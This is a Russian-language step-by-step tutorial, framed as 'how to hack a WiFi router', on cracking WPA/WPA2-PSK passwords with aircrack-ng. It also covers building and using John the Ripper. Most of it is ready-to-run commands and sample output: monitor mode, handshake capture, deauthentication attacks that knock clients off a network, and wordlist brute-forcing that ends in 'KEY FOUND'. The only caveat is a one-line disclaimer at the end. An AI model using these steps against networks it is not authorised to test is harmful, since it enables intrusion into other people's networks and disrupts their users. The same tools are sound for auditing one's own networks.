Коротко о Aircrack-NG

Как Пользоваться AirCrack-NG — Взлом WiFi — Инструкция

Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию aircrack-ng, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.

С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.

Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью aircrack-ng.

Как взломать WiFi — основные шаги:

  1. Установите последнюю версии aircrack-ng
  2. Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng
  3. Запустите airodump-ng для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  4. [Опционально] Используйте aireplay-ng для де-аутентификации клиента
  5. Запустите aircrack-ng для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия

1. Aircrack-ng: Скачать и Установить

Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

Установите необходимы зависимости:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Скачайте и установите последнюю версию aircrack-ng (текущая версия):

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install

Убедитесь что установлена именно последняя версия aircrack-ng:

$ aircrack-ng --help

  Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

2. Airmon-ng: Режим Мониторинга

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.

Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0
Interface	Chipset		Driver

wlan0		Intel 6235	iwlwifi - [phy0]
				(monitor mode enabled on mon0)

В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга.

Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

3. Airodump-ng: Перехват Рукопожатия

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды airodump-ng:

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
ОпцияОписание
-cКанал беспроводной сети
--bssidMAC адрес точки доступа
-wПрефикс файла в который будет записано рукопожатие
mon0Сетевой интерфейс
--ignore-negative-oneУбирает сообщение ‘fixed channel : -1’

Теперь нам остается только ждать когда airodump-ng словит рукопожатие.

Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55 в правом верхнем углу экрана.

Это сообщение означает, что airodump-ng успешно перехватил рукопожатие:

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

4. Aireplay-ng: Деаутентификации Клиента

Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.

После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

Отправить широковещательное deauth сообщение:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
ОпцияОписание
--deauth 100Сколько deauth сообщений отправить (0 — без ограничений)
-aMAC адрес точки доступа
-cMAC адрес клиента
mon0Сетевой интерфейс
--ignore-negative-oneУбирает сообщение ‘fixed channel : -1’

5. Aircrack-ng: Взлом WiFi Пароля

К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования.

Для взлома WiFi необходим словарь с паролями для перебора.

Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями.

Некоторые словари можно скачать отсюда.

Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
ОпцияОписание
-wПуть к словарю с паролями
-bMAC адрес точки доступа
WPAcrack.capФайл, содержащий перехваченное рукопожатие
                         Aircrack-ng 1.2 beta3 r2393

                   [00:08:11] 548872 keys tested (1425.24 k/s)

                           KEY FOUND! [ 987654321 ]

      Master Key    : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 

      Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 

      EAPOL HMAC    : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

6. Aircrack-ng: Пауза и Возобновление Перебора Паролей

Иногда нет возможности за один раз найти WPA/WPA2-PSK ключ с помощью aircrack-ng, особенно когда используется очень большой словарь для перебора.

К сожалению, в aircrack-ng нет встроенной паузы и нельзя возобновлять остановленный перебор, но это можно делать с помощью John The Ripper, который умеет сохранять и возобновлять сессии.

Установите John The Ripper

Установите John The Ripper, если вы не сделали этого ранее:

$ sudo apt-get install john

Пауза/Возобновление Aircrack-ng

При переборе WPA/WPA2-PSK ключей с помощью John The Ripper, вы можете узнать о текущем прогрессе, нажав почти на любую клавишу.

При нажатии q либо Ctrl-C, John The Ripper останавливает (ставит на паузу) перебор и сохраняет информацию о прогрессе текущей сессии в файл ~/.john/john.rec (по умолчанию).

Для возобновления сессии, запустите John с опцией --restore=[имя сессии].

Создадим с помощью John The Ripper сессию foo, через пайп перенаправим вывод в aircrack-ng и попробуем ПРИОСТАНОВИТЬ, а затем ВОЗОБНОВИТЬ перебор.

Aircrack-ng: НАЧАЛО ПЕРЕБОРА

Начнем Перебор WPA/WPA2-PSK ключей с помощью John The Ripper и aircrack-ng:

$ john --session=foo --stdout --wordlist=wordlist.dic | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
ОпцияОписание
--sessionИмя сессии
--wordlistПуть к словарю с паролями
-bMAC адрес точки доступа
WPAcrack.capФайл содержащий перехваченное рукопожатие

Aircrack-ng: ПАУЗА

Нажмите q либо Ctrl-C, чтобы остановить перебор.

Aircrack-ng: ВОЗОБНОВЛЕНИЕ

Возобновляем перебор с момента, когда он был остановлен (продолжаем сессию foo):

$ john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap

7. Подробнее о «John the Ripper» — Взломщик Паролей

«John the Ripper» — это быстрый взломщик паролей. Его основной целью является нахождение слабых UNIX паролей.

Вероятнее всего, Вам не нужно устанавливать «John the Ripper» для всей системы.

Вместо этого, после извлечения и компилирования исходного кода (см. ниже), Вы просто зайдете в директорию «run» и запустите Джона оттуда.

Собираем «John the Ripper»

Шаг 1: Скачаем последнюю версию «John the Ripper» и его подпись

$ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2
$ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2.sign
$ wget http://www.openwall.com/signatures/openwall-signatures.asc

Шаг 2: Подтвердим подпись

Это необходимая мера безопасности, поскольку мы имеем дело с опасной вещью.

Для этого установим открытый ключ:

$ pgp -ka openwall-signatures.asc

И проверим подпись:

$ pgp john-1.7.9.tar.bz2.sign john-1.7.9.tar.bz2
gpg: Signature made Wed 23 Nov 2011 01:38:48 PM CAT using RSA key ID 295029F1
gpg: Good signature from "Openwall Project <signatures@openwall.com>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: 0C 29 43 AE 1E CD 24 EA  6E 0C B6 EE F5 84 25 69

Мы должны увидеть, аналогичное вышеуказанному, сообщение. Обращаем внимание на строку Good signature from «Openwall Project … «, которая означает успешную проверку подписи.

Предупреждение при проверке подписи, это нормально. Более подробную информацию, Вы можете найти по ссылке: http://www.kernel.org/signature.html.

Шаг 3: Извлекаем и компилируем исходники

$ tar xvfj john-1.7.9.tar.bz2
$ cd john-1.7.9/src/
$ make
To build John the Ripper, type:
make clean <system>
where SYSTEM can be one of the following:
linux-x86-64-avx         Linux, x86-64 with AVX (2011+ Intel CPUs)
linux-x86-64-xop         Linux, x86-64 with AVX and XOP (2011+ AMD CPUs)
linux-x86-64             Linux, x86-64 with SSE2 (most common)
***

Находим в списке нашу систему и набираем:

$ make clean <system>

Где <system> — установленная у нас операционная система. В случае если Вы не нашли свою систему в списке, используйте:

$ make clean generic

Если все прошло успешно, вышеперечисленные действия приводят к созданию исполняемых файлов для Джона и связанных с ним утилит, в директории «../run/».

Также, Вы можете скопировать всю папку «run» куда угодно и запускать Джона оттуда.

Теперь мы можем перейти в директорию «../run/» и протестировать работу Джона:

$ cd ../run/
$ ./john --test
Many salts:	400332 c/s real, 400332 c/s virtual
Only one salt:	383795 c/s real, 391627 c/s virtual
---
Benchmarking: BSDI DES (x725) [32/32 BS]... DONE
Many salts:	13362 c/s real, 13388 c/s virtual
Only one salt:	13299 c/s real, 13299 c/s virtual
---
Benchmarking: FreeBSD MD5 [32/32 X2]... DONE
Raw:	9225 c/s real, 9225 c/s virtual
***

Установка «John the Ripper» в Ubuntu

Выполните следующую команду для установки «John the Ripper» в Ubuntu:

$ sudo apt-get install john

Установка «John the Ripper» в CentOS/RHEL

Выполните следующую команду для установки «John the Ripper» в CentOS/RHEL:

$ yum install john

Информация предоставленная в данной статье носит исключительно ознакомительный характер, автор статьи не несет ответственности за возможное причинение вреда